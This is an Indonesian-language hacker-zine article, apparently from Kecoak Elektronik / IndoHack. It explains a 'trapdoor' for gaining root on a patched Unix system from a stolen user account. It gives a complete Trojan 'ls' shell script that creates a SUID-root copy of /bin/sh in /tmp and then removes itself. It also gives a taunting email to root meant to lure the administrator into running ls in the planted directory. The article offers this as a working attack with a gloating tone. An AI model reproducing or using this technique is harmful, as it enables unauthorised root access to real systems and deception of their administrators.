Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor'
diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan
kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres,
atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali
(patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang
sysadmin tertipu, berakibat dibukanya akses ke dalam sistem. Misalkan kamu sudah berhari-hari mengoprek
sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf,
dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor.
Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin
diluar sana.
Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya
kamu 'pinjam'):
user1@korban> chmod 700 ~/.
Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika
beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang
bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin,
justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas,
perintah ls. Disinilah letak kelemahan UNIX dibanding uh, MS-DOS. Dalam UNIX, seorang sysadmin yang
baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau
/usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan
dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:
root# pwd
/usr/home/staff/user1
root# ls
maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori
/usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh cukup menarik, khan. Nah, sekarang
kita bisa buat sebuah skrip yang berisi:
#!/bin/sh
cp /bin/sh /tmp/vi-save-902887
chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls
simpan skrip tersebut di homedir user1, beri nama "ls" dan
user1@korban> chmod +x ls
sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1.
Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang'
sang admin. Login sebagai user1, dan kirim imel
user1@korban> mail root@localhost
Subject: "Heheheh Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd,
God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera
.
Saat menerima imel ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls,
tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887.
Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya.
Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root!
Heheheh.
Penutup
=======
Begitu dulu, deh, penjelasan dari kami. Semoga ada gunannya untuk kalian semua. Nggak lupa iseng-iseng
nereakin seluruh kru IndoHack, hackerindo, underground, dan kecoak elektronik!
Terbitan Online Kecoak Elektronik
http://k-elektronik.org
=====================================================================================
Eksploit, Trapdoor, Backdoor, dan Trojan Horse
dijelaskan oleh: Ganjaman dan SuperCock [members of IndoHack]
=====================================================================================
Langganan:
Komentar (Atom)
